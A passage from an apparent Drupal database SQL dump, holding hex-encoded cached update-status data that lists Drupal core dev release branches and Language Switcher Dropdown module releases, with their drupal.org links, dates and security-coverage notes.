53a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a383a2231312e782d646576223b613a31303a7b733a343a226e616d65223b733a31353a2264727570616c2031312e782d646576223b733a373a2276657273696f6e223b733a383a2231312e782d646576223b733a333a22746167223b733a343a2231312e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35353a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31312e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36303a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31312e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373837383233383935223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a353a227465726d73223b613a303a7b7d7d733a31303a2231302e362e782d646576223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c2031302e362e782d646576223b733a373a2276657273696f6e223b733a31303a2231302e362e782d646576223b733a333a22746167223b733a363a2231302e362e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31302e362e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31302e362e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373837303535373532223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a2231302e352e782d646576223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c2031302e352e782d646576223b733a373a2276657273696f6e223b733a31303a2231302e352e782d646576223b733a333a22746167223b733a363a2231302e352e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31302e352e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31302e352e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373739393833333235223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a2231302e342e782d646576223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c2031302e342e782d646576223b733a373a2276657273696f6e223b733a31303a2231302e342e782d646576223b733a333a22746167223b733a363a2231302e342e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31302e342e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31302e342e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373739333133333032223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a2231302e332e782d646576223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c2031302e332e782d646576223b733a373a2276657273696f6e223b733a31303a2231302e332e782d646576223b733a333a22746167223b733a363a2231302e332e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31302e332e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31302e332e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373338383030323138223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a2231302e322e782d646576223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c2031302e322e782d646576223b733a373a2276657273696f6e223b733a31303a2231302e322e782d646576223b733a333a22746167223b733a363a2231302e322e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31302e322e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31302e322e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373332323837303233223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a2231302e312e782d646576223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c2031302e312e782d646576223b733a373a2276657273696f6e223b733a31303a2231302e312e782d646576223b733a333a22746167223b733a363a2231302e312e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31302e312e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31302e312e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373133303031373935223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a31303a2231302e302e782d646576223b613a31303a7b733a343a226e616d65223b733a31373a2264727570616c2031302e302e782d646576223b733a373a2276657273696f6e223b733a31303a2231302e302e782d646576223b733a333a22746167223b733a363a2231302e302e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35373a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f31302e302e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36323a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d31302e302e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231363936393330373330223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a353a227465726d73223b613a303a7b7d7d733a393a22392e352e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20392e352e782d646576223b733a373a2276657273696f6e223b733a393a22392e352e782d646576223b733a333a22746167223b733a353a22392e352e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f392e352e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d392e352e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231373031383031333632223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a393a22392e342e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20392e342e782d646576223b733a373a2276657273696f6e223b733a393a22392e342e782d646576223b733a333a22746167223b733a353a22392e342e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f392e342e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d392e342e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231363833313233323237223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a393a22392e332e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20392e332e782d646576223b733a373a2276657273696f6e223b733a393a22392e332e782d646576223b733a333a22746167223b733a353a22392e332e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f392e332e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d392e332e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231363634333835393139223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a353a227465726d73223b613a303a7b7d7d733a393a22392e322e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20392e322e782d646576223b733a373a2276657273696f6e223b733a393a22392e322e782d646576223b733a333a22746167223b733a353a22392e322e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f392e322e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d392e322e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231363534383931393037223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a393a22392e312e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20392e312e782d646576223b733a373a2276657273696f6e223b733a393a22392e312e782d646576223b733a333a22746167223b733a353a22392e312e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f392e312e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d392e312e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231363337373636323737223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a393a22392e302e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20392e302e782d646576223b733a373a2276657273696f6e223b733a393a22392e302e782d646576223b733a333a22746167223b733a353a22392e302e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f392e302e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d392e302e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231363232303633343234223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a393a22382e392e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20382e392e782d646576223b733a373a2276657273696f6e223b733a393a22382e392e782d646576223b733a333a22746167223b733a353a22382e392e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e392e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e392e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231363337313838363235223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a393a22382e382e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20382e382e782d646576223b733a373a2276657273696f6e223b733a393a22382e382e782d646576223b733a333a22746167223b733a353a22382e382e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e382e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e382e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231363036333634393934223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a393a22382e372e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20382e372e782d646576223b733a373a2276657273696f6e223b733a393a22382e372e782d646576223b733a333a22746167223b733a353a22382e372e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e372e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e372e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231353839393837363132223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a393a22382e362e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20382e362e782d646576223b733a373a2276657273696f6e223b733a393a22382e362e782d646576223b733a333a22746167223b733a353a22382e362e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e362e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e362e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231353733363837393835223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a393a22382e352e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20382e352e782d646576223b733a373a2276657273696f6e223b733a393a22382e352e782d646576223b733a333a22746167223b733a353a22382e352e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e352e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e352e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231353535353333313831223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a353a227465726d73223b613a303a7b7d7d733a393a22382e342e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20382e342e782d646576223b733a373a2276657273696f6e223b733a393a22382e342e782d646576223b733a333a22746167223b733a353a22382e342e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e342e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e342e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231353333303437383830223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a353a227465726d73223b613a303a7b7d7d733a393a22382e332e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20382e332e782d646576223b733a373a2276657273696f6e223b733a393a22382e332e782d646576223b733a333a22746167223b733a353a22382e332e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e332e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e332e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231353232323633343830223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a353a227465726d73223b613a303a7b7d7d733a393a22382e322e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20382e322e782d646576223b733a373a2276657273696f6e223b733a393a22382e322e782d646576223b733a333a22746167223b733a353a22382e322e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e322e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e322e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231343932363234393832223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a353a227465726d73223b613a303a7b7d7d733a393a22382e312e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20382e312e782d646576223b733a373a2276657273696f6e223b733a393a22382e312e782d646576223b733a333a22746167223b733a353a22382e312e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e312e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e312e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231343734343738333933223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a353a227465726d73223b613a303a7b7d7d733a393a22382e302e782d646576223b613a31303a7b733a343a226e616d65223b733a31363a2264727570616c20382e302e782d646576223b733a373a2276657273696f6e223b733a393a22382e302e782d646576223b733a333a22746167223b733a353a22382e302e78223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f382e302e782d646576223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d382e302e782d6465762e7461722e677a223b733a343a2264617465223b733a31303a2231343539393030343339223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b7d733a383a226465762d6d61696e223b613a31303a7b733a343a226e616d65223b733a31313a2264727570616c206d61696e223b733a373a2276657273696f6e223b733a383a226465762d6d61696e223b733a333a22746167223b733a343a226d61696e223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a35313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f64727570616c2f72656c65617365732f6d61696e223b733a31333a22646f776e6c6f61645f6c696e6b223b733a35363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f64727570616c2d6d61696e2e7461722e677a223b733a343a2264617465223b733a31303a2231373837383234373434223b733a353a2266696c6573223b733a303a22223b733a383a227365637572697479223b733a35393a224465762072656c656173657320617265206e6f7420636f76657265642062792044727570616c2073656375726974792061647669736f726965732e223b733a353a227465726d73223b613a303a7b7d7d7d733a31303a226c6173745f6665746368223b693a313738373833363337383b7d, 1787922778);
INSERT INTO `key_value_expire` (`collection`, `name`, `value`, `expire`) VALUES
('update_available_releases', 'lang_dropdown', 0x613a31303a7b733a353a227469746c65223b733a32363a224c616e67756167652053776974636865722044726f70646f776e223b733a31303a2273686f72745f6e616d65223b733a31333a226c616e675f64726f70646f776e223b733a343a2274797065223b733a31343a2270726f6a6563745f6d6f64756c65223b733a31383a22737570706f727465645f6272616e63686573223b733a363a22382e782d322e223b733a31383a22636f6d706f7365725f6e616d657370616365223b733a32303a2264727570616c2f6c616e675f64726f70646f776e223b733a31343a2270726f6a6563745f737461747573223b733a393a227075626c6973686564223b733a343a226c696e6b223b733a34343a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f6c616e675f64726f70646f776e223b733a353a227465726d73223b733a303a22223b733a383a2272656c6561736573223b613a31303a7b733a373a22382e782d322e34223b613a31313a7b733a343a226e616d65223b733a32313a226c616e675f64726f70646f776e20382e782d322e34223b733a373a2276657273696f6e223b733a373a22382e782d322e34223b733a333a22746167223b733a373a22382e782d322e34223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f6c616e675f64726f70646f776e2f72656c65617365732f382e782d322e34223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f6c616e675f64726f70646f776e2d382e782d322e342e7461722e677a223b733a343a2264617465223b733a31303a2231373538353239363630223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31383a225e392e33207c7c205e3130207c7c205e3131223b7d733a373a22382e782d322e33223b613a31313a7b733a343a226e616d65223b733a32313a226c616e675f64726f70646f776e20382e782d322e33223b733a373a2276657273696f6e223b733a373a22382e782d322e33223b733a333a22746167223b733a373a22382e782d322e33223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f6c616e675f64726f70646f776e2f72656c65617365732f382e782d322e33223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f6c616e675f64726f70646f776e2d382e782d322e332e7461722e677a223b733a343a2264617465223b733a31303a2231373336393238333432223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a313a7b693a303b733a393a22427567206669786573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31383a225e392e33207c7c205e3130207c7c205e3131223b7d733a373a22382e782d322e32223b613a31313a7b733a343a226e616d65223b733a32313a226c616e675f64726f70646f776e20382e782d322e32223b733a373a2276657273696f6e223b733a373a22382e782d322e32223b733a333a22746167223b733a373a22382e782d322e32223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f6c616e675f64726f70646f776e2f72656c65617365732f382e782d322e32223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f6c616e675f64726f70646f776e2d382e782d322e322e7461722e677a223b733a343a2264617465223b733a31303a2231373336373636363434223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31383a225e392e33207c7c205e3130207c7c205e3131223b7d733a373a22382e782d322e31223b613a31313a7b733a343a226e616d65223b733a32313a226c616e675f64726f70646f776e20382e782d322e31223b733a373a2276657273696f6e223b733a373a22382e782d322e31223b733a333a22746167223b733a373a22382e782d322e31223b733a363a22737461747573223b733a393a227075626c6973686564223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f6c616e675f64726f70646f776e2f72656c65617365732f382e782d322e31223b733a31333a22646f776e6c6f61645f6c696e6b223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f6c616e675f64726f70646f776e2d382e782d322e312e7461722e677a223b733a343a2264617465223b733a31303a2231363838303633333236223b733a353a2266696c6573223b733a303a22223b733a353a227465726d73223b613a313a7b733a31323a2252656c656173652074797065223b613a323a7b693a303b733a393a22427567206669786573223b693a313b733a31323a224e6577206665617475726573223b7d7d733a383a227365637572697479223b733a34343a22436f76657265642062792044727570616c27732073656375726974792061647669736f727920706f6c696379223b733a31383a22636f72655f636f6d7061746962696c697479223b733a31313a225e392e33207c7c205e3130223b7d733a373a22382e782d322e30223b613a31313a7b733a343a226e616d65223b733a32313a226c616e675f64726f70646f7